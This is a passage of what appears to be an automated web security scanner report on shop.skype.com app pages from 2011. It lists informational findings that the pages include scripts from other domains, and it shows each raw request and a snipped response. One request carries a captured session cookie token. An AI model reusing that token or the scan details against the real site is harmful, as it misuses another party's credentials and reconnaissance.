...[SNIP]...

18.361. http://shop.skype.com/apps/Business/Clownfish-for-Skype.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Business/Clownfish-for-Skype.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Business/Clownfish-for-Skype.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.362. http://shop.skype.com/apps/Business/Zaplee-Phone-System-In-The-Cloud.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Business/Zaplee-Phone-System-In-The-Cloud.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Business/Zaplee-Phone-System-In-The-Cloud.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.363. http://shop.skype.com/apps/Business/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Business/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Business/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.364. http://shop.skype.com/apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-only/CallBurner-MP3-Call-Recorder.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.365. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-Call-Recorder.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/Pamela-Call-Recorder.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-only/Pamela-Call-Recorder.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.366. http://shop.skype.com/apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-only/Pamela-for-Skype-Basic-Edition.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.367. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Basic-Version.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.368. http://shop.skype.com/apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-only/PrettyMay-Call-Recorder-for-Skype-Professional-Version.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.369. http://shop.skype.com/apps/Call-recording-audio-only/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-only/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-only/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.370. http://shop.skype.com/apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-video/Evaer-video-recorder-for-Skype.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.371. http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://shop.skype.com/apps/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: shop.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Content-Length: 58076
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.372. http://shop.skype.com/apps/Call-recording-audio-video/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Call-recording-audio-video/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Call-recording-audio-video/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.373. http://shop.skype.com/apps/Desktop-whiteboard-sharing/IDroo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Desktop-whiteboard-sharing/IDroo.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Desktop-whiteboard-sharing/IDroo.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.374. http://shop.skype.com/apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Desktop-whiteboard-sharing/InnerPass-Screen-Sharing.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.375. http://shop.skype.com/apps/Desktop-whiteboard-sharing/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Desktop-whiteboard-sharing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Desktop-whiteboard-sharing/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.376. http://shop.skype.com/apps/Faxing/PamFax-for-Mac-OS-X.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Faxing/PamFax-for-Mac-OS-X.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Faxing/PamFax-for-Mac-OS-X.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.377. http://shop.skype.com/apps/Faxing/PamFax-for-Windows.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Faxing/PamFax-for-Windows.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Faxing/PamFax-for-Windows.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

18.378. http://shop.skype.com/apps/Faxing/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Faxing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Faxing/index.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:29:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 75856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script charset="utf-8" type="text/javascript" src="http://www.skypeassets.com/i/js/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.rating-system.com/js/rs/rsiframe.js"></script>
...[SNIP]...
<div id="modalPhoneCompare">
<script type="text/javascript" src="http://snippet.omm.crownpeak.com/s/178d8338-bcf1-41f0-a0f2-f3c9ca897a35"></script>
...[SNIP]...

18.379. http://shop.skype.com/apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.skype.com
Path:   /apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Integrations-with-popular-software/Skylook-for-MS-Outlook.html HTTP/1.1
Host: shop.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



